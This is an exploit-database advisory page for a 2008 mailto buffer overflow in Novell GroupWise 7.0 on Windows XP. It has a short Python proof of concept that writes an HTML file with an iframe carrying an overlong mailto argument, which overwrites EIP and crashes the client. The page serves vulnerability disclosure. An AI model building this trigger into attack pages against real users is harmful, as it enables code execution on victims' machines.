header-logo
Suggest Exploit
vendor:
GroupWise 7.0
by:
Juan Pablo Lopez Yacubian
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GroupWise 7.0
Affected Version From: GroupWise 7.0
Affected Version To: GroupWise 7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:novell:groupwise_7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Xp
2008

GroupWise 7.0 Buffer Overflow Vulnerability

GroupWise 7.0 is vulnerable to a buffer overflow vulnerability when a maliciously crafted mailto scheme is used as the default mail client. This can lead to the overwriting of the EIP and execution of arbitrary code. A proof of concept is provided which creates an HTML file with an iframe containing a mailto scheme with an extensive argument, causing the buffer overflow.

Mitigation:

Ensure that GroupWise 7.0 is not used as the default mail client.
Source

Exploit-DB raw data:

PRODUCT: GroupWise 7.0
OS: Windows Xp

The scheme "mailto" is vulnerable if one takes as default mail client to 
GroupWise, the fault is to implement the scheme followed by an extensive 
argument and this causes the buffer overflow. This brings the consequence that 
can overwrite the EIP and is able to execute arbitrary code. The result with a 
debbuger us what reveals. 

Access violation when executing [41414141] 

What power is that vulnerability to attach a html file which is included in an 
iframe with the scheme badly formed runs only watch.

proof of concept

#!/usr/bin/python

a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w")
file.write(a)
file.close()

greetings!

Juan Pablo Lopez Yacubian

# milw0rm.com [2008-04-28]